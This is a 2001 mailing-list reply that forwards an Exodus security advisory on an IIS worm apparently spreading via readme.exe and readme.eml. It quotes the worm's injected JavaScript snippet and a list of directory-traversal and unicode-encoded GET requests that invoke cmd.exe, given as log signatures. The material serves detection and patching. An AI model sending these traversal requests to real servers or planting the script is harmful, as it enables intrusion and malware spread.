On Wed, 2001-09-19 at 02:49, Valkai Elod wrote:
>
> Din 18 sept. apar in logurile de la apache:
> "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
> "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
> "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
>
> Cererile vin din afara, cu gramada in fiecare doua (2) secunde.
>
> Asta cine mai e ???
Exodus Confidential Customer Communication
Date: September 18, 2001
Title: Security Advisory - IIS Worm
Summary:
Exodus, as a professional courtesy to it's
customers, is distributing this Security Threat Advisory. As many of
you
have probably experienced, there is a new and prolific worm propagating
across the Internet. The worm appears to target a large number of
well-known vulnerabilities in Microsoft Windows IIS 4 and IIS 5. In
addition to targeting Microsoft IIS web servers there is the potential
that
clients operating non-Microsoft sites will experience denial of service
type
effects as the worm scans for additional vulnerable hosts.
Proposed Remedy:
Microsoft patches are available at:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutio
ns/security/default.asp
The worm appears to have a number of propagation
methods. Infected hosts scan their associated Class "B" address space
for
additional victims; they also scan open network shares and may populate
their served web pages with a snippet of Java code that induces some
versions of Microsoft Outlook/Outlook Express to download hostile
executable
"readme.exe". The code can also propagate via email with the hostile
payload bearing the name "readme.exe".
An initial analysis of the worm by the Exodus
Cyber
Attack Team and others within the security community revealed the
following
details.
Victim sites initiate a tftp session with the
infecting host and download "admin.dll". Once on the victim system,
admin.dll performs a number of actions to include elevating the
permissions
of both the "guest" and "iuser" accounts to administrator and creating
a
trojanized version of a number files to include:
c:\program files\outlook express\wabmig.exe
c:\program files\outlook express\wab.exe.
c:\program files\windows nt\pinball\pinball.exe
c:\winnt\system32\mspaint.exe.
c:\program files\outlook express\msimn.exe.
c:\program files\internet explorer\connection
wizard\isignup.exe
c:\program files\internet explorer\connection
wizard\inetwiz.exe.
c:\winnt\system32\inetsrv\inetmgr.exe.
c:\program files\internet explorer\iexplore.exe.
c:\program files\internet explorer\connection
wizard\icwconn2.exe.
c:\program files\internet explorer\connection
wizard\icwconn1.exe.
c:\program files\windows nt\dialer.exe.
c:\program files\netmeeting\conf.exe.
c:\winnt\system32\cmmgr32.exe.
The Exodus CAT Team is in the process of
analyzing
these trojanized files, and additional details regarding these files
will be
distributed as they are discovered.
The worm also creates a file named "readme.eml".
On
at least one compromised system, the files appeared in the following
directories:
c:\Inetpub\wwwroot
c:\Program Files\Common Files\System\ado
c:\Program Files\Microsoft Script Debugger
c:\Microsoft Script Debugger\NetMeeting
c:\Winnt\Help\debug
c:\Winnt\Help\iishelp
c:\Winnt\Help\iishelp\iis
c:\Winnt\system32\inetsrv\iisadmin
A number of websites are reporting the addition
of
the following snippet of code to their pages:
</body>
</html>
<html><script
language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
The readme.eml file appears to facilitate the
downloading of the hostile code by older versions of Outlook and Outlook
Express.
Until additional details about this worm are
known,
Exodus is recommending that any infected host be pulled off the network.
Sites operating Microsoft IIS web servers that
have
not yet been infected should be patched immediately through the most
recent
Microsoft Security Advisory.
All users in your enterprise should be apprised
of
the threat and notified of the
potential risk associated with any attachments
labeled "readme.exe ".
A review of the IIS logs for a targeted server
may
display some or all of the following entries:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET
/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../wi
nnt/system32/cmd.exe?/c+dir
GET
/scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..%2f../winnt/system32/cmd.exe?/c+dir
Should you have any questions, or need any
assistance please feel free to contact our Response Center at
1-877-393-7878.
Exodus does not guarantee or warrant that the
information and recommendations set forth in this advisory will enable
customers to stop the worm from propagating or operate a completely
secure
or error-free Internet site. Exodus makes no warranty or guarantee as
to
suitability or efficacy of any vendor supplied software patches.
Respectfully,
Exodus Communications, Inc.
"The Infrastructure for the Digital Economy"
Exodus Confidential Customer Communications
Web: <http://www.exodus.net>
--
Florin Andrei
"Our kernel does have source control: its name is
Linus Torvalds, CVS with a brain." - Nicholas Knight
---
Send e-mail to '[EMAIL PROTECTED]' with 'unsubscribe rlug' to
unsubscribe from this list.
